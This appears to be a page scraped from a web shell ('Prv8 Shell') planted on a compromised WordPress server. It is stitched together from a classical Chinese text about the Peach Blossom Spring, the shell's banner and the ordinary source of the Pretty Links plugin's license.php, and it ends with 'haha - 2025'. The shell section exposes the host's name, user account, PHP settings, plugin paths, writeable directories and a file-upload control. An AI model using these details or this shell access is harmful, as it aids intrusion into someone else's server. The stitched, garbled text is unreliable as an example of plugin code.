晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/stando/www/wp-content/plugins/pretty-link/app/views/admin/update/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/stando/www/wp-content/plugins/pretty-link/app/views/admin/update/license.php
<?php if(!defined('ABSPATH')) {die('You are not allowed to call this page directly.');} ?>
<?php
global $plp_update;
$mothership_license_str = isset($_POST[$plp_update->mothership_license_str]) ? sanitize_key($_POST[$plp_update->mothership_license_str]) : $plp_update->mothership_license;
?>

<div class="prli-page-title"><?php esc_html_e('Pretty Links Pro License', 'pretty-link'); ?></div>

<?php if( !isset($li) or empty($li) ): ?>
  <p class="description">
    <?php
      printf(
        // translators: %1$s: link to pro site, %2$s: link to pro site login page
        esc_html__('You must have a License Key to enable automatic updates for Pretty Links Pro. If you don\'t have a License please go to %1$s to get one. If you do have a license you can login at %2$s to manage your licenses and site activations.', 'pretty-link'),
        '<a href="https://prettylinks.com/pl/license-alert/buy">prettylinks.com</a>',
        '<a href="https://prettylinks.com/pl/license-alert/login">prettylinks.com/login</a>'
      );
    ?>
  </p>
  <form name="activation_form" method="post" action="">
    <?php wp_nonce_field('activation_form'); ?>

    <table class="form-table">
      <tr class="form-field">
        <td valign="top" width="225px"><?php esc_html_e('Enter Your Pretty Links Pro License Key:', 'pretty-link'); ?></td>
        <td>
          <input type="text" name="<?php echo esc_attr($plp_update->mothership_license_str); ?>" value="<?php echo esc_attr($mothership_license_str); ?>"/>
        </td>
      </tr>
    </table>
    <p class="submit">
      <input type="submit" name="Submit" class="button button-primary" value="<?php echo esc_attr(sprintf(__('Activate License Key on %s', 'pretty-link'), PrliUtils::site_domain())); ?>" />
    </p>
  </form>

  <?php if(!$plp_update->is_installed()): ?>
    <div>&nbsp;</div>

    <div class="prli-page-title" id="prli_upgrade"><?php esc_html_e('Upgrade to Pro', 'pretty-link'); ?></div>

    <div>
      <?php
        printf(
          // translators: %1$s: open link tag, %2$s: close link tag
          esc_html__('It looks like you haven\'t %1$supgraded to Pretty Links Pro%2$s yet. Here are just a few things you could be doing with pro:', 'pretty-link'),
          '<a href="https://prettylinks.com/pl/license-alert/upgrade" target="_blank">',
          '</a>'
        );
      ?>
    </div>

    <div>&nbsp;</div>

    <ul style="padding-left: 25px;">
      <li>&bullet; <?php esc_html_e('Auto-replace keywords throughout your site with Pretty Links', 'pretty-link'); ?></li>
      <li>&bullet; <?php esc_html_e('Protect your affiliate links by using Cloaked Redirects', 'pretty-link'); ?></li>
      <li>&bullet; <?php esc_html_e('Redirect based on a visitor\'s location', 'pretty-link'); ?></li>
      <li>&bullet; <?php esc_html_e('Auto-prettylink your Pages &amp; Posts', 'pretty-link'); ?></li>
      <li>&bullet; <?php esc_html_e('Find out what works and what doesn\'t by split testing your links', 'pretty-link'); ?></li>
      <li>&bullet; <?php esc_html_e('And much, much more!', 'pretty-link'); ?></li>
    </ul>

    <div>&nbsp;</div>
    <div><?php esc_html_e('Plus, upgrading is fast, easy and won\'t disrupt any of your existing links or data. And there\'s even a 14 day money back guarantee.', 'pretty-link'); ?></div>
    <div>&nbsp;</div>
    <div><?php esc_html_e('We think you\'ll love it!', 'pretty-link'); ?></div>
    <div>&nbsp;</div>
    <div><a href="https://prettylinks.com/pl/license-alert/upgrade-1" class="button button-primary"><?php esc_html_e('Upgrade to Pro today!', 'pretty-link'); ?></a></div>
  <?php endif; ?>
<?php else: ?>
  <div class="prli-license-active">
    <div><h4><?php esc_html_e('Active License Key Information:', 'pretty-link'); ?></h4></div>
    <table>
      <tr>
        <td><?php esc_html_e('License Key:', 'pretty-link'); ?></td>
        <td>********-****-****-****-<?php echo esc_html(substr($li['license_key']['license'], -12)); ?></td>
      </tr>
      <tr>
        <td><?php esc_html_e('Status:', 'pretty-link'); ?></td>
        <td><b><?php echo esc_html(sprintf(__('Active on %s', 'pretty-link'), PrliUtils::site_domain())); ?></b></td>
      </tr>
      <tr>
        <td><?php esc_html_e('Product:', 'pretty-link'); ?></td>
        <td><?php echo esc_html($li['product_name']); ?></td>
      </tr>
      <tr>
        <td><?php esc_html_e('Activations:', 'pretty-link'); ?></td>
        <td>
          <?php
            printf(
              // translators: %1$s: open b tag, %2$s: close b tag, %3$d: current activation count, %4$s: max activations
              esc_html__('%1$s%3$d of %4$s%2$s sites have been activated with this license key', 'pretty-link'),
              '<b>',
              '</b>',
              esc_html($li['activation_count']),
              esc_html(ucwords($li['max_activations']))
            );
          ?>
        </td>
      </tr>
    </table>
    <div class="prli-deactivate-button"><a href="<?php echo esc_url(admin_url('admin.php?page=pretty-link-updates&action=deactivate&_wpnonce='.wp_create_nonce('pretty-link_deactivate'))); ?>" class="button button-primary" onclick="return confirm('<?php echo esc_attr(sprintf(__("Are you sure? Pretty Links Pro will not be functional on %s if this License Key is deactivated.", 'pretty-link'), PrliUtils::site_domain())); ?>');"><?php echo esc_html(sprintf(__('Deactivate License Key on %s', 'pretty-link'), PrliUtils::site_domain())); ?></a></div>
  </div>
  <?php if(!$this->is_installed()): ?>
    <div><a href="<?php echo esc_url($this->update_plugin_url()); ?>" class="button button-primary"><?php esc_html_e('Upgrade plugin to Pro', 'pretty-link'); ?></a></div>
    <div>&nbsp;</div>
  <?php endif; ?>
  <?php require(PRLI_VIEWS_PATH.'/admin/update/edge_updates.php'); ?>
  <br/>
  <div id="prli-version-string"><?php printf(esc_html__("You're currently running version %s of Pretty Links Pro", 'pretty-link'), '<b>'.esc_html(PRLI_VERSION).'</b>'); ?></div>
<?php endif; ?>


haha - 2025